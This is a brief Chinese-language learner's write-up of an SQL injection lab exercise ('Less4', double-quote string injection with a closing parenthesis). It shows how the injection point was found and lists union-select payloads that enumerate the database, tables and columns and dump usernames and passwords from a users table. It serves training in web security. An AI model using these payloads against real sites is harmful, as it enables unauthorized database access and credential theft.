Less4 双引号字符型注入
1.判断注入点、注入类型
(1)?id=1' 页面返回正常
(2)?id=1 and 1=2--+ 页面返回正常
(3)当输入双引号 " 时数据库报错,根据报错内容可知,这里对id应该是对id加了双引号并且,放在一对括号中。
?id=1")页面报错
?id=1") and 1=1 --+ 页面正常响应
?id=1") and 1=2 --+ 页面响应错误
2.使用union联合查询即可
附上payload
?id=-1") order by 3--+ ?id=-1") union select 1,2,database()--+ ?id=-1") union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database()--+ ?id=-1") union select 1,2,group_concat(column_name) from information_schema.columns where table_name = 'users' --+ ?id=-1") union select 1,2,group_concat(username,0x3a,password) from users--+
PS:小白总结
(1) 当一直没有报错信息尝试输入其他的特殊符号 如 &") 看能否使数据库报错,从报错内容中获取相关信息。
如果一直不报错考虑其他类型的注入。
小白注入学记录!!